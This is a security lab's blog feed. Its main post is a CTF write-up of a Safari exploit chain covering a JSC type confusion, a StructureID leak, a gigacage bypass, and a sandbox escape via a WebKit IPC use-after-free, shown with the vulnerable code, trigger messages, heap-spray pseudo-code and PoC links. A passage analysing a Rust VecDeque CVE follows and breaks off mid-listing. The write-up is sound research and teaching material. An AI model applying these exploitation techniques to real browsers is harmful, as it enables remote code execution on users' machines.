Systems Software and Security Labhttps://gts3.org/2021-01-06T00:00:00+01:00The Apple M1 System on Chip (SoC)2021-01-06T00:00:00+01:002021-01-06T00:00:00+01:00Fan Sangtag:gts3.org,2021-01-06:/2021/overview-of-apple-m1-soc.html<p>This blog provides an overview of the newly released Apple M1 System on Chip (SoC).</p><blockquote>
<p>Small chip. Giant leap.
The Apple M1 System on Chip (SoC) is Apple's first
in-house chip designed specifically for Mac.
It delivers incredible performance, custom technologies,
and revolutionary power efficiency.
In this blog we provide an overview of this new piece of technology,
including the general architecture,
reasons behind the astounding performance,
and security.</p>
</blockquote>
<p><embed src="/blog/apple-m1/apple-m1-overview.pdf" width="100%" height="600px" /></p>Hack The Real: An exploitation chain to break the Safari browser2019-12-13T00:00:00+01:002019-12-13T00:00:00+01:00Hanqing Zhaotag:gts3.org,2019-12-13:/2019/Real-World-CTF-2019-Safari.html<p>Exploiting type confusion bugs in latest JSC and escaping the sandbox</p><h2>Introduction</h2>
<blockquote>
<p>This blog is created with Insu Yun and Wen Xu.</p>
</blockquote>
<p>In the Real World CTF 2019 final, we designed a guest Safari exploitation (w/ sandbox escape) challenge based on two full-chain Safari exploits we built previously. We leveraged the new JSC structureID entropy mitigation bypass techniques to get RCE in the content process. To escape the sandbox, we formulated some flexible techniques for exploiting UAF bugs in Webkit’s broker IPC.</p>
<p>We would like to thank <a href="https://www.cc.gatech.edu/~mxu80/">Meng Xu</a> for helpful ideas, and all teams in the final for making efforts to solve our challenges.</p>
<h2>Attacking JavaScriptCore</h2>
<p>To simulate an attack against the webcontent process, we deliberately introduce a bug into the JSC. Even it is a runtime bug, we can exploit it by introducing unintended JIT side effects.</p>
<h3>Analyzing the FastStructureCache</h3>
<p>We introduce a vulnerable FastPath to enable RegExp's allocation cache, namely, FastStructureCache. The full patch could be found <a href="https://gist.githubusercontent.com/HQ1995/96d8922f915bc44ca794611344324a8f/raw/41d80298dc276d22d1efcc2b63a4ccf93266ed68/patch.diff">here</a>.</p>
<p>Here is the code snippet related to the bug:</p>
<div class="highlight"><pre><span></span><code><span class="k">class</span><span class="w"> </span><span class="nc">FastStructureCache</span><span class="w"> </span><span class="k">final</span><span class="w"> </span><span class="o">:</span><span class="w"> </span><span class="k">public</span><span class="w"> </span><span class="n">JSNonFinalObject</span><span class="w"> </span><span class="p">{</span>
<span class="k">public</span><span class="o">:</span>
<span class="w"> </span><span class="k">using</span><span class="w"> </span><span class="n">Base</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">JSNonFinalObject</span><span class="p">;</span>
<span class="w"> </span><span class="k">static</span><span class="w"> </span><span class="n">Structure</span><span class="o">**</span><span class="w"> </span><span class="n">fastCacheStructure</span><span class="p">;</span>
<span class="w"> </span><span class="k">static</span><span class="w"> </span><span class="kt">uint64_t</span><span class="w"> </span><span class="n">fastCacheSizeMax</span><span class="p">;</span>
<span class="w"> </span><span class="k">static</span><span class="w"> </span><span class="kt">uint64_t</span><span class="w"> </span><span class="n">fastCacheSizeUsed</span><span class="p">;</span>
<span class="w"> </span><span class="k">static</span><span class="w"> </span><span class="n">Structure</span><span class="o">*</span><span class="w"> </span><span class="nf">createStructureFastPath</span><span class="p">(</span><span class="n">VM</span><span class="o">&</span><span class="w"> </span><span class="n">vm</span><span class="p">,</span><span class="w"> </span>
<span class="w"> </span><span class="n">SGlobalObject</span><span class="o">*</span><span class="w"> </span><span class="n">globalObject</span><span class="p">,</span><span class="w"> </span><span class="n">JSValue</span><span class="w"> </span><span class="n">prototype</span><span class="p">,</span><span class="w"> </span>
<span class="w"> </span><span class="k">const</span><span class="w"> </span><span class="n">TypeInfo</span><span class="o">&</span><span class="w"> </span><span class="n">typeInfo</span><span class="p">,</span><span class="w"> </span><span class="k">const</span><span class="w"> </span><span class="n">ClassInfo</span><span class="o">*</span><span class="w"> </span><span class="n">classInfo</span><span class="p">)</span>
<span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">fastCacheStructure</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">fastCacheStructure</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="k">new</span><span class="w"> </span><span class="n">Structure</span><span class="o">*</span><span class="p">[</span><span class="n">fastCacheSizeMax</span><span class="p">];</span>
<span class="w"> </span><span class="kt">uint64_t</span><span class="w"> </span><span class="n">idx</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span>
<span class="w"> </span><span class="k">while</span><span class="w"> </span><span class="p">(</span><span class="n">idx</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="n">fastCacheSizeMax</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="c1">// * [1]</span>
<span class="w"> </span><span class="c1">// Later, we will set the correct globalObject and prototype</span>
<span class="w"> </span><span class="n">fastCacheStructure</span><span class="p">[</span><span class="n">idx</span><span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">Structure</span><span class="o">::</span><span class="n">create</span><span class="p">(</span>
<span class="w"> </span><span class="n">vm</span><span class="p">,</span><span class="w"> </span><span class="n">globalObject</span><span class="p">,</span><span class="w"> </span><span class="n">prototype</span><span class="p">,</span><span class="w"> </span><span class="n">typeInfo</span><span class="p">,</span><span class="w"> </span><span class="n">classInfo</span><span class="p">);</span>
<span class="w"> </span><span class="n">idx</span><span class="o">++</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">fastCacheSizeUsed</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="n">fastCacheSizeMax</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">Structure</span><span class="o">*</span><span class="w"> </span><span class="n">return_value</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">fastCacheStructure</span><span class="p">[</span><span class="n">fastCacheSizeUsed</span><span class="p">];</span>
<span class="w"> </span><span class="c1">// * [2]</span>
<span class="w"> </span><span class="c1">// set the correct global object and prototype</span>
<span class="w"> </span><span class="n">return_value</span><span class="o">-></span><span class="n">setPrototypeWithoutTransition</span><span class="p">(</span><span class="n">vm</span><span class="p">,</span><span class="w"> </span><span class="n">prototype</span><span class="p">);</span>
<span class="w"> </span><span class="n">return_value</span><span class="o">-></span><span class="n">setGlobalObject</span><span class="p">(</span><span class="n">vm</span><span class="p">,</span><span class="w"> </span><span class="n">globalObject</span><span class="p">);</span>
<span class="w"> </span><span class="n">fastCacheSizeUsed</span><span class="w"> </span><span class="o">+=</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">return_value</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">Structure</span><span class="o">::</span><span class="n">create</span><span class="p">(</span><span class="n">vm</span><span class="p">,</span><span class="w"> </span><span class="n">globalObject</span><span class="p">,</span><span class="w"> </span><span class="n">prototype</span><span class="p">,</span><span class="w"> </span><span class="n">typeInfo</span><span class="p">,</span><span class="w"> </span><span class="n">classInfo</span><span class="p">);</span>
<span class="w"> </span><span class="p">}</span>
<span class="k">protected</span><span class="o">:</span>
<span class="w"> </span><span class="n">FastStructureCache</span><span class="p">(</span><span class="n">VM</span><span class="o">&</span><span class="p">,</span><span class="w"> </span><span class="n">Structure</span><span class="o">*</span><span class="w"> </span><span class="n">structure</span><span class="p">);</span>
<span class="p">};</span>
</code></pre></div>
<p>At [1], we create a cache for the allocation of structures related to RegExp. Although It does not have proper prototypes, we will set it with the corresponding prototype later at [2]. It at least introduces two bugs. First, the type info and class info are never changed. The objects created later will hold incorrect information in its structure. However, I haven't tried to find a way to exploit it. Second, as Figure 1 illustrates, comparing with the normal process in <a href="https://github.com/WebKit/webkit/blob/master/Source/JavaScriptCore/runtime/StructureInlines.h#L39">Structure::create</a>, it fails to mark that the object has become a prototype with <code>didBecomePrototype()</code>.</p>
<center>
<img style="border-radius: 0.3125em;
box-shadow: 0 2px 4px 0 rgba(34,36,38,.12),0 2px 10px 0 rgba(34,36,38,.08);"
src="https://i.imgur.com/mAL0biO.png" width = "500">
<br>
<div style="color:orange; border-bottom: 1px solid #d9d9d9;
display: inline-block;
color: #999;
padding: 2px;"><i>Figure 1. Wrongly create the strucures</i></div>
</center>
<p><br></p>
<h3>Prelimitary exploitation primitives</h3>
<p>According to lokihardt's <a href="https://bugs.chromium.org/p/project-zero/issues/detail?id=1649">comments</a>, JSC doesn't allow native arrays to have Proxy objects as prototypes. However, with this bug, we can break the assumption holding by the JSC.</p>
<p>As Figure 2 delineates, suppose there is a RegExp has appeared in an native array's protochain. While putting a Proxy object into RegExp's protochain, it will not trigger any conversion to <code>swithToSlowPutArrayStorage</code>. Thus, we follow the same tricks described by lokihardt. i.e., introducing unintended side effects by abusing the <code>HasIndexedProperty</code> IR, causing type confusion in the JSC.</p>
<center>
<img style="border-radius: 0.3125em;
box-shadow: 0 2px 4px 0 rgba(34,36,38,.12),0 2px 10px 0 rgba(34,36,38,.08);"
src="https://i.imgur.com/XyDDb5k.png" width = "600">
<br>
<div style="color:orange; border-bottom: 1px solid #d9d9d9;
display: inline-block;
color: #999;
padding: 2px;"><i>Figure 2. JavaScriptCore doesn't allow native arrays to have Proxy objects as prototypes</i></div>
</center>
<p><br></p>
<p>We give a code snippert to demonstrate the <code>addrOf</code> and <code>fakeObj</code> primitives. After executing the <a href="https://gist.github.com/HQ1995/96d8922f915bc44ca794611344324a8f/raw/049e280021d72b390df923bbda59216af0996fa2/poc.js">poc</a>, we can notice the segment fault.</p>
<div class="highlight"><pre><span></span><code>➜<span class="w"> </span>./jsc<span class="w"> </span>pwn.js
0x00007fa42ebdc240
<span class="o">[</span><span class="m">1</span><span class="o">]</span><span class="w"> </span><span class="m">27955</span><span class="w"> </span>segmentation<span class="w"> </span>fault<span class="w"> </span>./jsc<span class="w"> </span>pwn.js
</code></pre></div>
<h3>Leaking valid structureID</h3>
<p>Initially, we formulated an approach to leak the strctureID while writing the exploit chains(Actually, there is a team that used the same technique with us). However, there is a <a href="https://i.blackhat.com/eu-19/Thursday/eu-19-Wang-Thinking-Outside-The-JIT-Compiler-Understanding-And-Bypassing-StructureID-Randomization-With-Generic-And-Old-School-Methods.pdf">talk</a> at BlackHat-EU proposed a public method against structureID randomization. Another team also used it during the competition. </p>
<p>The bypass trick based on a simple but effective fact that <strong>not all</strong> builtin functions and "mechanisms" rely on valid structureIDs. </p>
<p>One way to utilize this weakness is that abusing <code>Function.prototype.toString.call()</code> with a special fake object. Let us walk through the entire process.</p>
<p>Figure 3 illustrates how to leverage it to leak the strcutureID. We need to fake three objects (An object w/o valid structureID, a fake FunctionExecutable object, and a fake UnlinkedFunctionExecutable object), bypassing the <code>isBuiltinFunction</code> check. In this way, we can leak a valid structureID and a butterfly pointer.</p>
<center>
<img style="border-radius: 0.3125em;
box-shadow: 0 2px 4px 0 rgba(34,36,38,.12),0 2px 10px 0 rgba(34,36,38,.08);"
src="https://i.imgur.com/6juvDXa.png" width = "400">
<br>
<div style="color:orange; border-bottom: 1px solid #d9d9d9;
display: inline-block;
color: #999;
padding: 2px;"><i>Figure 3. Leaking the valid structureID. (The blue boxes represent fake object, and the green boxes represent normal objects.)</i></div>
</center>
<p><br></p>
<p>We give a snippet of <a href="https://gist.githubusercontent.com/HQ1995/96d8922f915bc44ca794611344324a8f/raw/41d80298dc276d22d1efcc2b63a4ccf93266ed68/leakid.js">example code</a> to show how to leak the structureID:</p>
<div class="highlight"><pre><span></span><code>➜<span class="w"> </span>./jsc<span class="w"> </span>pwn.js
Structure<span class="w"> </span>ID:<span class="w"> </span>8230700009a5e
</code></pre></div>
<h2>Bypassing the gigacage isolation and get code execution</h2>
<p>Two approaches have been widely used in the community to bypass Webkit's gigacage (an isolated heap mechanism in JSC), i.e., abusing <a href="https://github.com/LinusHenze/WebKit-RegEx-Exploit/blob/master/pwn.js#L176">WASM's Memory buffer</a> or <a href="https://github.com/niklasb/sploits/blob/master/safari/regexp-uxss.html#L128">Object's butterfly</a>, because the gigacage does not isolate them.</p>
<p>By using the OOB read described in the previous section, we can also leak the butterfly of the target object. So it could be much easier if we use the butterfly approach.</p>
<p>Finally, we overwrite a jitted function's memory into shellcodes to get code execution.</p>
<p>Furthermore, you can find a copy of the binary to do your examination from <a href="https://github.com/5lipper/ctf/tree/master/rwctf19-final/FastStructureCache">here</a>.</p>
<center>
<img style="border-radius: 0.3125em;
box-shadow: 0 2px 4px 0 rgba(34,36,38,.12),0 2px 10px 0 rgba(34,36,38,.08);"
src="https://i.imgur.com/lenFyfL.png" width = "600">
<br>
<div style="color:orange; border-bottom: 1px solid #d9d9d9;
display: inline-block;
color: #999;
padding: 2px;"><i>Figure 4. Bypassing gigacage isolation using a fake object on butterfly. (The blue boxes represent fake objects, and the green boxes represent real objects/memory.)</i></div>
</center>
<p><br></p>
<h2>Reviving the bug: Escaping the sandbox through Core-IPC</h2>
<h3>Webkit broker IPC</h3>
<p>Because of the modern browsers' multithreading model and sandbox model, the broker IPC has become one of the most powerful attack surfaces for sandbox escape. e.g., the successful demonstration against Chrome Desktop in 2018.</p>
<p>As Figure 5 indicates, Webkit's broker IPC server consists of several message proxies. The WebProcesses and the UI-Process can communicate through IPC.</p>
<center>
<img style="border-radius: 0.3125em;
box-shadow: 0 2px 4px 0 rgba(34,36,38,.12),0 2px 10px 0 rgba(34,36,38,.08);"
src="https://i.imgur.com/TTOj4NS.png" width = "400">
<br>
<div style="color:orange; border-bottom: 1px solid #d9d9d9;
display: inline-block;
color: #999;
padding: 2px;"><i>Figure 5. The communications between web process and other processes. They have two sides, and can be syncoronous or asyncronous.</i></div>
</center>
<p><br></p>
<h3>An intro of a Use-After-Free bug in the UI-Process</h3>
<p>We introduce a deliberate bug by reverting a <a href="https://gist.github.com/HQ1995/96d8922f915bc44ca794611344324a8f/raw/3b605cbb50324ad5f45a651ad9fe93145c03a412/sandbox.diff">patch</a> for a bug exploited by us a few months ago. You can check the patch at here.</p>
<p>We eliminate the contextID check in the <code>VideoFullScreenMessageProxy::setHasVideo</code> to make the bug could be easily triggered by sending this message multiple times. As Figure 6 indicates, every contextID is associated with a series of objects. The references are maintained by the <code>WTF::HashMap</code>. According to its implementation, the index "0" has a special meaning that the bucket is empty. However, we eliminate the check, and we can pass a zero contextID into it. While putting objects into the hashmap continuously, we could trigger vulnerable rehash behavior. It tries to copy the objects in the old hashmap to the new hashmap. Once the old objects are deallocated, a dangling pointer will appear. </p>
<center>
<img style="border-radius: 0.3125em;
box-shadow: 0 2px 4px 0 rgba(34,36,38,.12),0 2px 10px 0 rgba(34,36,38,.08);"
src="https://i.imgur.com/qSJ1K7H.png" width = "5000">
<br>
<div style="color:orange; border-bottom: 1px solid #d9d9d9;
display: inline-block;
color: #999;
padding: 2px;"><i>Figure 6. Raw pointers considered harmful</i></div>
</center>
<p><br></p>
<p>Due to there is a raw pointer in the PlaybackSessionInterface that points to a <code>PlaybackSessionModel</code> object, the raw pointer will become a dangling pointer when triggering the rehash. Once the <code>VideoFullscreenInterfaceMac</code> object is deconstructed, the use-after-free will be triggered. </p>
<p>The UAF could be triggering by sending the following messages to the UI-process.</p>
<div class="highlight"><pre><span></span><code><span class="n">send</span><span class="p">(</span><span class="n">Messages</span><span class="o">::</span><span class="n">VideoFullscreenManagerProxy</span><span class="o">::</span><span class="n">SetHasVideo</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span><span class="w"> </span><span class="nb">true</span><span class="p">));</span>
<span class="n">send</span><span class="p">(</span><span class="n">Messages</span><span class="o">::</span><span class="n">VideoFullscreenManagerProxy</span><span class="o">::</span><span class="n">SetHasVideo</span><span class="p">(</span><span class="mi">-3</span><span class="p">,</span><span class="w"> </span><span class="nb">true</span><span class="p">));</span>
<span class="n">send</span><span class="p">(</span><span class="n">Messages</span><span class="o">::</span><span class="n">VideoFullscreenManagerProxy</span><span class="o">::</span><span class="n">SetHasVideo</span><span class="p">(</span><span class="mi">255</span><span class="p">,</span><span class="w"> </span><span class="nb">true</span><span class="p">));</span>
<span class="n">send</span><span class="p">(</span><span class="n">Messages</span><span class="o">::</span><span class="n">VideoFullscreenManagerProxy</span><span class="o">::</span><span class="n">SetHasVideo</span><span class="p">(</span><span class="mi">7</span><span class="p">,</span><span class="w"> </span><span class="nb">true</span><span class="p">));</span>
<span class="n">send</span><span class="p">(</span><span class="n">Messages</span><span class="o">::</span><span class="n">VideoFullscreenManagerProxy</span><span class="o">::</span><span class="n">SetHasVideo</span><span class="p">(</span><span class="mi">4095</span><span class="p">,</span><span class="w"> </span><span class="nb">true</span><span class="p">));</span>
<span class="n">send</span><span class="p">(</span><span class="n">Messages</span><span class="o">::</span><span class="n">VideoFullscreenManagerProxy</span><span class="o">::</span><span class="n">SetHasVideo</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="nb">true</span><span class="p">));</span>
<span class="n">send</span><span class="p">(</span><span class="n">Messages</span><span class="o">::</span><span class="n">VideoFullscreenManagerProxy</span><span class="o">::</span><span class="n">SetHasVideo</span><span class="p">(</span><span class="mi">18</span><span class="p">,</span><span class="w"> </span><span class="nb">true</span><span class="p">));</span>
<span class="n">send</span><span class="p">(</span><span class="n">Messages</span><span class="o">::</span><span class="n">VideoFullscreenManagerProxy</span><span class="o">::</span><span class="n">SetHasVideo</span><span class="p">(</span><span class="mi">800</span><span class="p">,</span><span class="w"> </span><span class="nb">true</span><span class="p">));</span>
</code></pre></div>
<p>If you recompile the browser with ASAN, you can find some crash reports like <a href="https://gist.github.com/HQ1995/7a84068d75e5b36ad4b5335666294f0f">this one</a>.</p>
<h3>A flexible approach to spray the heap in the UI process</h3>
<p>To exploit UAF bugs in CPP, we usually need to figure out where to put our fake vtable and how to get the address of the fake vtable. </p>
<p>Instead of sending some messages multiple times, we abuse the shared memory between the web process and UI process to achieve the goal.</p>
<p>Here is a pseudo-code for this message</p>
<div class="highlight"><pre><span></span><code><span class="n">WebProcess</span><span class="o">::</span><span class="n">singleton</span><span class="p">().</span><span class="n">parentProcessConnection</span><span class="p">()</span><span class="o">-></span><span class="n">sendSync</span><span class="p">(</span>
<span class="w"> </span><span class="n">Messages</span><span class="o">::</span><span class="n">WebPasteboardProxy</span><span class="o">::</span>
<span class="w"> </span><span class="n">SetPasteboardBufferForType</span><span class="p">(</span><span class="s">"name"</span><span class="p">,</span><span class="w"> </span><span class="s">"type"</span><span class="p">,</span><span class="w"> </span><span class="n">handle</span><span class="p">,</span><span class="w"> </span><span class="mh">0x10000000</span><span class="p">),</span><span class="w"> </span>
<span class="w"> </span><span class="n">Messages</span><span class="o">::</span><span class="n">WebPasteboardProxy</span><span class="o">::</span>
<span class="w"> </span><span class="n">SetPasteboardBufferForType</span><span class="o">::</span><span class="n">Reply</span><span class="p">(</span><span class="n">newChangeCount</span><span class="p">),</span><span class="w"> </span><span class="mi">0</span><span class="p">);</span>
</code></pre></div>
<h3>Refilling the freed object stably</h3>
<p>The <code>WebAuthenticatorCoordinatorProxy</code> has a <code>hash</code> parameter, whose type is <code>Vector<uint8_t></code>, we can abuse it to refill the memory hole.</p>
<div class="highlight"><pre><span></span><code><span class="kt">void</span><span class="w"> </span><span class="nf">WebAuthenticatorCoordinatorProxy::makeCredential</span><span class="p">(</span><span class="n">FrameIdentifier</span><span class="w"> </span><span class="n">frameId</span><span class="p">,</span><span class="w"> </span>
<span class="w"> </span><span class="n">SecurityOriginData</span><span class="o">&&</span><span class="w"> </span><span class="n">origin</span><span class="p">,</span><span class="w"> </span>
<span class="w"> </span><span class="n">Vector</span><span class="o"><</span><span class="kt">uint8_t</span><span class="o">>&&</span><span class="w"> </span><span class="n">hash</span><span class="p">,</span><span class="w"> </span>
<span class="w"> </span><span class="n">PublicKeyCredentialCreationOptions</span><span class="o">&&</span><span class="w"> </span><span class="n">options</span><span class="p">,</span><span class="w"> </span>
<span class="w"> </span><span class="n">RequestCompletionHandler</span><span class="o">&&</span><span class="w"> </span><span class="n">handler</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">handleRequest</span><span class="p">({</span><span class="w"> </span><span class="n">WTFMove</span><span class="p">(</span><span class="n">hash</span><span class="p">),</span><span class="w"> </span>
<span class="w"> </span><span class="n">WTFMove</span><span class="p">(</span><span class="n">options</span><span class="p">),</span><span class="w"> </span>
<span class="w"> </span><span class="n">makeWeakPtr</span><span class="p">(</span><span class="n">m_webPageProxy</span><span class="p">),</span><span class="w"> </span>
<span class="w"> </span><span class="n">WebAuthenticationPanelResult</span><span class="o">::</span><span class="n">Unavailable</span><span class="p">,</span><span class="w"> </span>
<span class="w"> </span><span class="k">nullptr</span><span class="p">,</span><span class="w"> </span>
<span class="w"> </span><span class="n">GlobalFrameIdentifier</span><span class="w"> </span>
<span class="w"> </span><span class="p">{</span><span class="w"> </span>
<span class="w"> </span><span class="n">m_webPageProxy</span><span class="p">.</span><span class="n">webPageID</span><span class="p">(),</span><span class="w"> </span>
<span class="w"> </span><span class="n">frameId</span><span class="w"> </span>
<span class="w"> </span><span class="p">},</span><span class="w"> </span>
<span class="w"> </span><span class="n">WTFMove</span><span class="p">(</span><span class="n">origin</span><span class="p">)</span><span class="w"> </span>
<span class="w"> </span><span class="p">},</span><span class="w"> </span>
<span class="w"> </span><span class="n">WTFMove</span><span class="p">(</span><span class="n">handler</span><span class="p">));</span>
<span class="p">}</span>
</code></pre></div>
<p>The reason why it is very flexible is that the uint8 vector can help us to refill the memory in byte granularity without any impurities.</p>
<p>Here is a snippet pseudo-code of this message:</p>
<div class="highlight"><pre><span></span><code><span class="n">sendWithAsyncReply</span><span class="p">(</span><span class="n">Messages</span><span class="o">::</span><span class="n">WebAuthenticatorCoordinatorProxy</span><span class="o">::</span><span class="n">MakeCredential</span><span class="p">(</span>
<span class="w"> </span><span class="n">m_mainFrame</span><span class="o">-></span><span class="n">frameID</span><span class="p">(),</span><span class="w"> </span>
<span class="w"> </span><span class="n">SecurityOriginData</span><span class="p">(</span><span class="s">"http"</span><span class="p">,</span><span class="w"> </span><span class="s">"hqzhao.me"</span><span class="p">,</span><span class="w"> </span><span class="mi">8080</span><span class="p">),</span><span class="w"> </span><span class="n">hash</span><span class="p">,</span><span class="w"> </span><span class="n">options</span><span class="p">),</span><span class="w"> </span>
<span class="w"> </span><span class="n">callback</span>
<span class="p">);</span>
</code></pre></div>
<h3>Hijicking the control flow through vtable</h3>
<p>By utilizing the tricks described above, as Figure 7 illustrates, we can hijack the control flow through the virtual function table and do some ROP to spawn a calculator.</p>
<center>
<img style="border-radius: 0.3125em;
box-shadow: 0 2px 4px 0 rgba(34,36,38,.12),0 2px 10px 0 rgba(34,36,38,.08);"
src="https://i.imgur.com/OG2KV4E.png" width = "5000">
<br>
<div style="color:orange; border-bottom: 1px solid #d9d9d9;
display: inline-block;
color: #999;
padding: 2px;"><i>Figure 7. From UAF to sandbox escape</i></div>
</center>
<p><br></p>
<h2>Reflections and conclusion</h2>
<p>Although the road to break the macOS's Safari is tedious, I think the leading edge of Safari security research is on iOS. There are still several open challenges for security researches to overcome. e.g., how to get code execution after getting arbitrary address read/write on a PAC enabled iPhone. To the sandbox, AAPL has enhanced the sandbox profile; even some BSD syscalls can not be invoked in the container sandbox. Furthermore, if you want the original challenges in Real World CTF, please check <a href="https://github.com/5lipper/ctf">slipper's repo</a>.</p>Analysis of CVE-2018-1000657: OOB write in Rust's VecDeque::reserve()2019-08-14T00:00:00+02:002019-08-14T00:00:00+02:00Yechan Baetag:gts3.org,2019-08-14:/2019/cve-2018-1000657.html<p>A bug in VecDeque::reserve() of Rust's standard library allowed out-of-bound write in heap region.</p><h2>Introduction</h2>
<p>Rust is a system programming language that aims to provide both memory safety and low-level control. As a system programming language, Rust allows potentially dangerous operations such as raw pointer manipulation or foreign function accesses, but only when explicitly stated in unsafe blocks. Accordingly, any bugs associated with the logics inside unsafe blocks can break Rust's safety guarantee, allowing attackers to compromise the Rust program.</p>
<p>In this blog posting,
we'd like to demonstrate a PoC exploitation of one of such bugs
in the Rust's standard library.
More specifically,
we exploit an out-of-bound write bug
(<a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=%20CVE-2018-1000657">CVE-2018-1000657</a>)
in <code>VecDeque::reserve()</code>,
in which the developer
incorrectly checks its length with the internal buffer capacity (larger)
instead of the user-facing capacity (smaller),
breaking an invariant expected by the internal unsafe block
(allowing to access beyond the allowed slot).
When the bug is triggered,
the unsafe block performs an out-of-bound write
in the heap region.</p>
<h2>The Bug</h2>
<p>Rust's <a href="https://doc.rust-lang.org/std/collections/struct.VecDeque.html">VecDeque</a> is a growable double-ended queue implemented as a <a href="https://en.wikipedia.org/wiki/Circular_buffer">ring buffer</a>. Rust's VecDeque implementation reserves one empty slot to distinguish its full and empty status. Thus, if a VecDeque has an internal buffer of size N, users will be able to use N-1 slots of it.</p>
<p><img alt="Example of VecDeque status" src="/blog/cve-2018-1000657.assets/ring-buffer.png"></p>
<p>The main cause of CVE-2018-1000657 is the confusion between VecDeque's internal buffer capacity with its user-facing capacity in <code>VecDeque::reserve()</code> function. <code>VecDeque::reserve()</code> function increases the capacity of VecDeque (if needed) so that it can hold at least <code>additional</code> more elements.</p>
<p>This is the code of <code>VecDeque::reserve()</code>:</p>
<div class="highlight"><pre><span></span><code><span class="k">pub</span><span class="w"> </span><span class="k">fn</span><span class="w"> </span><span class="nf">reserve</span><span class="p">(</span><span class="o">&</span><span class="k">mut</span><span class="w"> </span><span class="bp">self</span><span class="p">,</span><span class="w"> </span><span class="n">additional</span><span class="p">:</span><span class="w"> </span><span class="kt">usize</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="kd">let</span><span class="w"> </span><span class="n">old_cap</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="bp">self</span><span class="p">.</span><span class="n">cap</span><span class="p">();</span>
<span class="w"> </span><span class="kd">let</span><span class="w"> </span><span class="n">used_cap</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="bp">self</span><span class="p">.</span><span class="n">len</span><span class="p">()</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span>
<span class="w"> </span><span class="kd">let</span><span class="w"> </span><span class="n">new_cap</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">used_cap</span><span class="p">.</span><span class="n">checked_add</span><span class="p">(</span><span class="n">additional</span><span class="p">)</span>
<span class="w"> </span><span class="p">.</span><span class="n">and_then</span><span class="p">(</span><span class="o">|</span><span class="n">needed_cap</span><span class="o">|</span><span class="w"> </span><span class="n">needed_cap</span><span class="p">.</span><span class="n">checked_next_power_of_two</span><span class="p">())</span>
<span class="w"> </span><span class="p">.</span><span class="n">expect</span><span class="p">(</span><span class="s">"capacity overflow"</span><span class="p">);</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="n">new_cap</span><span class="w"> </span><span class="o">></span><span class="w"> </span><span class="bp">self</span><span class="p">.</span><span class="n">capacity</span><span class="p">()</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="bp">self</span><span class="p">.</span><span class="n">buf</span><span class="p">.</span><span class="n">reserve_exact</span><span class="p">(</span><span class="n">used_cap</span><span class="p">,</span><span class="w"> </span><span class="n">new_cap</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">used_cap</span><span class="p">);</span>
<span class="w"> </span><span class="k">unsafe</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="bp">self</span><span class="p">.</span><span class="n">handle_cap_increase</span><span class="p">(</span><span class="n">old_cap</span><span class="p">);</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="p">}</span>
<span class="p">}</span>
</code></pre></div>
<p>Here, the check <code>new_cap > self.capacity()</code> is wrong. The code compares the required internal buffer size (<code>new_cap</code>) with its user-facing size (<code>self.capacity()</code>), so it might execute codes inside the if block even if the internal buffer size stays the same. The problem is that the unsafe function <code>VecDeque::handle_cap_increase()</code> assumes <code>new_cap</code> to be greater than <code>old_cap</code>.</p>
<p>Now let's look at the code of <code>VecDeque::handle_cap_increase()</code>:</p>
<div class="highlight"><pre><span></span><code><span class="k">unsafe</span><span class="w"> </span><span class="k">fn</span><span class="w"> </span><span class="nf">handle_cap_increase</span><span class="p">(</span><span class="o">&</span><span class="k">mut</span><span class="w"> </span><span class="bp">self</span><span class="p">,</span><span class="w"> </span><span class="n">old_cap</span><span class="p">:</span><span class="w"> </span><span class="kt">usize</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="kd">let</span><span class="w"> </span><span class="n">new_cap</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="bp">self</span><span class="p">.</span><span class="n">cap</span><span class="p">();</span>
<span class="w"> </span><span class="c1">// Move the shortest contiguous section of the ring buffer</span>
<span class="w"> </span><span class="c1">// T H</span>
<span class="w"> </span><span class="c1">// [o o o o o o o . ]</span>
<span class="w"> </span><span class="c1">// T H</span>
<span class="w"> </span><span class="c1">// A [o o o o o o o . . . . . . . . . ]</span>
<span class="w"> </span><span class="c1">// H T</span>
<span class="w"> </span><span class="c1">// [o o . o o o o o ]</span>
<span class="w"> </span><span class="c1">// T H</span>
<span class="w"> </span><span class="c1">// B [. . . o o o o o o o . . . . . . ]</span>
<span class="w"> </span><span class="c1">// H T</span>
